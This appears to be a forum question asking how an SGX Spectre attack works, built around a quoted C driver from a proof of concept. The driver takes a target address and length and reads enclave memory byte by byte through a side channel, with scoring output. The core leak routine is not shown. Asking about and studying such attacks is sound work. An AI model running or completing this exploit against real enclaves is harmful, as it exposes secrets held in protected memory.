Working mechanism of sgx spectre attack

[buttercutter]

Could anyone explain the working mechanism of sgx spectre attack ?

How is ecall_get_offset() caching function actually used in this sgx spectre exploit ?

int spectre_main(int argc, char **argv) {
	size_t malicious_x; 
	sgx_status_t ret  = ecall_get_offset(global_eid, &malicious_x); /* default for malicious_x */
	if (ret != SGX_SUCCESS)
        	abort();

	
	int i, score[2], len=40;
	uint8_t value[2];
	
	for (i = 0; i < sizeof(array2); i++)
		array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */

	if (argc == 3) {
		sscanf(argv[1], "%p", (void**)(&malicious_x));
		malicious_x -= (size_t)array1dupe; /* Convert input value into a pointer */
		sscanf(argv[2], "%d", &len);
	}
	
	printf("Reading %d bytes:\n", len);
	
	while (--len >= 0) {
		printf("Reading at malicious_x = %p... ", (void*)malicious_x);
		readMemoryByte(malicious_x++, value, score);
		printf("%s: ", (score[0] >= 2*score[1] ? "Success" : "Unclear"));
		printf("0x%02X='%c' score=%d ", value[0], (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
		if (score[1] > 0)
			printf("(second best: 0x%02X score=%d)", value[1], score[1]);
		printf("\n");
	}

	return (0);
 }